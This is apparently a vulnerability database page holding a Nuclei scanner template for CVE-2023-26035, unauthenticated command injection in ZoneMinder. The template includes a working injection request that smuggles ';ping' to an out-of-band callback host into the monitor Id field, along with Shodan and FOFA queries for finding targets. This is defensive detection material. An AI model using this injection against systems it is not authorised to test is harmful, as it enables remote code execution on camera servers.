| Reporter | Title | Published | Views | Family All 44 |
|---|---|---|---|---|
| ZoneMinder Snapshots Command Injection Exploit | 14 Nov 202300:00 | – | zdt | |
| ZoneMinder Snapshots < 1.37.33 - Unauthenticated Remote Code Execution Exploit | 18 Mar 202400:00 | – | zdt | |
| Exploit for Missing Authorization in Zoneminder | 27 Dec 202318:44 | – | githubexploit | |
| Exploit for Missing Authorization in Zoneminder | 24 Dec 202313:37 | – | githubexploit | |
| Exploit for Missing Authorization in Zoneminder | 11 Dec 202319:23 | – | githubexploit | |
| Exploit for Missing Authorization in Zoneminder | 12 Dec 202314:44 | – | githubexploit | |
| Exploit for Missing Authorization in Zoneminder | 13 Dec 202315:40 | – | githubexploit | |
| CVE-2023-26035 | 25 Feb 202301:07 | – | alpinelinux | |
| The vulnerability of the shell_exec() function in the software for video surveillance by ZoneMinder, which allows a intruder to execute arbitrary code. | 6 Mar 202300:00 | – | bdu_fstec | |
| CVE-2023-26035 | 10 Nov 202320:44 | – | circl |
id: CVE-2023-26035
info:
name: ZoneMinder Snapshots - Command Injection
author: Unblvr1,whotwagner
severity: critical
description: |
ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras.Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id.
impact: |
Unauthenticated attackers can execute arbitrary commands on the ZoneMinder server by exploiting missing authorization checks, potentially compromising all monitored camera systems and recorded footage.
remediation: |
Upgrade to ZoneMinder version 1.36.33 or 1.37.33 or later.
reference:
- https://www.rapid7.com/db/modules/exploit/unix/webapp/zoneminder_snapshots/
- https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr
- https://packetstormsecurity.com/files/175675/ZoneMinder-Snapshots-Command-Injection.html
- https://github.com/rvizx/CVE-2023-26035
- https://nvd.nist.gov/vuln/detail/CVE-2023-26035
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-26035
cwe-id: CWE-862
epss-score: 0.80462
epss-percentile: 0.99574
cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: zoneminder
product: zoneminder
shodan-query:
- html:"ZM - Login"
- http.html:"zm - login"
fofa-query: body="zm - login"
tags: cve,cve2023,rce,zoneminder,unauth,packetstorm,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /index.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: csrf_token
group: 1
regex:
- csrfMagicToken = \"(key:[a-f0-9]{40},\d+)
internal: true
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
view=snapshot&action=create&monitor_ids[0][Id]=;ping+{{interactsh-url}}&__csrf_magic={{csrf_token}}
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
# digest: 4a0a00473045022100ff7f17692fa6d8747eb445ed3e18b8da65922996d3e8da31e27c5bccb64b9c6302205014e9a0006b8de091b061056e9818deafa8daf9c25b629071b85086570567d6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation